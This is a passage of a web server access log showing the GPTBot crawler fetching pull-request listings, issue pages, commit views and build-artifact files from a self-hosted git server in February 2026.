3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=all&type=all" +[17/Feb/2026:17:41:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json?display=rendered" [Client 74.7.227.38] [Length 10959] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" +[17/Feb/2026:17:41:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2f__pycache__" [Client 74.7.227.38] [Length 21491] [Gzip 4.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__" +[17/Feb/2026:17:41:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:17:41:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:41:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp2.md?display=rendered" [Client 74.7.227.38] [Length 23941] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp2.md" +[17/Feb/2026:17:41:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp2.md?display=source" [Client 74.7.227.38] [Length 56428] [Gzip 9.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp2.md" +[17/Feb/2026:17:41:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=latest&state=all&type=all" +[17/Feb/2026:17:41:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:17:41:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:41:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:17:41:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:17:41:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fAssetPilot" [Client 74.7.227.38] [Length 60528] [Gzip 15.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot" +[17/Feb/2026:17:41:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fGoldMonitor" [Client 74.7.227.38] [Length 60553] [Gzip 15.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor" +[17/Feb/2026:17:41:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:17:41:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:17:41:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:17:41:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/Debug/net8.0" [Client 74.7.227.38] [Length 9826] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0" +[17/Feb/2026:17:41:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 10931] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:17:41:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 10959] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:17:41:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 10959] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:17:41:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 10972] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:17:41:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 10963] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:17:41:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 10960] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:17:41:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 11008] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:17:41:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:17:41:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:17:41:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:41:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:41:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:41:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:41:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:17:41:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 11009] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:17:41:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 10956] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:17:41:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 10931] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:17:41:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 10931] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:17:41:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:17:41:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:17:41:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:41:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:17:41:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10069] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:17:41:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:42:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:42:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:42:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 10956] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:17:42:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:17:42:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 10956] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:17:42:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2f3.31.10%2fCMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 24210] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:17:42:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:42:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles%2f3.31.10%2fCMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 24188] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:17:42:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9949] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=farduedate&state=all&type=all" +[17/Feb/2026:17:42:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.53] [Sent-to 192.168.0.250] 